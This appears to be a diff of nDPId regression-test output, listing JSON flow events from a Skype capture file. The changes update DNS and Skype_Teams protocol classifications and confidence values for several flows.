+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970649777,"flow_last_seen":1431970680320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694738,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970650785,"flow_last_seen":1431970683130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1138,7 +1141,7 @@ 00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1147,38 +1150,38 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970666903,"flow_last_seen":1431970694687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51258,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706168,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706168,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 